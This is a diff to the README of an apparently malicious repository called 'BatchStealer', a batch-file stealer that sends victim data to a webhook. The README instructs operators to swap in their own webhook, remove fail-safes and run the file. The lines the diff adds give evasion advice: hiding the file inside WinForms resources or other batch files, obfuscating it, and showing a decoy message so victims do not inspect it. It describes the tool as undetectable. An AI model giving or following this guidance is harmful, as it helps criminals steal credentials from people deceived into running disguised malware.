Takaovi/BatchStealer/README.md

 # How to use

 1. Change the webhook to yours
-2. Remove fail-safes
+2. Remove fail-safes (goto xxx)
 3. Run the batch file

 ### Use cases
 * Obfuscate (or not, FUD anyways) add as winforms resource.
-* Obfuscate (or not, FUD anyways) and put inside another batch file.
+* Obfuscate (or not, FUD anyways) and put inside another batch file to kind of hide it.
+* Edit the batch to echo something and give it an excuse to exit.
+Obfuscation helps to hide if user decides to open the file.

+### Avoid
+* Just changing the webhook and doing nothing else.
+If the batch file does nothing the user will open it to see what's wrong.

 # Features